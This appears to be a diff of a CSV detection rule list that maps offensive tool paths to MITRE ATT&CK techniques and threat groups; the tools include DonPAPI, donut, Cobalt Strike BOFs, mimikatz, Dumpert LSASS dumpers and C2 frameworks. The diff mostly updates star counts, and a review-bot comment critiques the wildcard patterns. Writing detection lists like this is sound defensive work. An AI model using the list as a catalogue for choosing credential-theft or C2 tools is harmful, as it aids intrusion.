Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dompdf-rce*","offensive_tool_keyword","POC","This repository contains a vulnerable demo application using dompdf 1.2.0 and an exploit that achieves remote code execution via a ttf+php polyglot file.","T1203 - T1204","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/positive-security/dompdf-rce","1","1","N/A","N/A","2","170","69","2022-03-17T18:05:07Z","2022-03-14T19:51:06Z" -"*/DonPAPI.git*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*/DonPAPI.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*/donut *.exe*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*/donut.exe*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. 
DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*/donut.git","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*/DonPAPI.git*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*/DonPAPI.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*/donut *.exe*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*/donut.exe*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*/donut.git","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" "*/Donut_Linux*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*/Donut_Windows*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" 
"*/DonutCS/Donut.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*/donutmodule.c*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*/DonutTest/*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*/DotNet/SigFlip*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*/donutmodule.c*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*/DonutTest/*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*/DotNet/SigFlip*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*/download-stager.js*","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. 
It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","1126","186","2023-08-27T18:33:49Z","2020-03-09T05:48:58Z" "*/dpap-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dpipe.sh*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker","1","1","N/A","N/A","1","55","28","2023-06-14T23:25:46Z","2022-03-08T17:13:24Z" 
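Review bot: The keyword `"*/donut.git"` on the rewritten donut row has no trailing `*`, unlike `"*/DonPAPI.git*"` and `"*/Dome.git*"` in the same hunk, so if the consuming rule treats a pattern without a closing wildcard as end-anchored, it will miss a command line or URL that continues after `.git` (a clone with a target directory, a query string). Since the row is already being rewritten for the star and fork counts, I would change the key to `"*/donut.git*"`. The same applies to `"*/ducky.py"` and `"*/dumpmethod/*.py"` in the following hunk, which continues beyond what is shown here. The donut rows also carry a trailing space in the tactics field, `"TA0002 - TA0003 "`, which an exact-match lookup on tactic IDs would not normalise; `"TA0002 - TA0003"` is safer.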
@@ -3417,52 +3426,53 @@ "*/drda-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/drda-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Drones/SleepDialogue.razor*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*/drunkpotato*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/drop-sc.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/drunkpotato*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/dsniff.c*","offensive_tool_keyword","dsniff","password sniffer. handles FTP. 
Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. SymantecpcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","N/A","N/A","2","167","44","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z" "*/dsniff.services*","offensive_tool_keyword","dsniff","password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. Symantec pcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","N/A","N/A","2","167","44","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z" -"*/ducky.py","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1101","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*/DueDLLigence.git*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","441","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" +"*/ducky.py","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1101","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/DueDLLigence.git*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","442","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" "*/dukes_apt29.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/dump_lsass.*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard 
Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" -"*/DumpCerts*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 script argument","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*/DumpCreds*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 script argument","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*/dumpert.c*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" -"*/Dumpert/*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" 
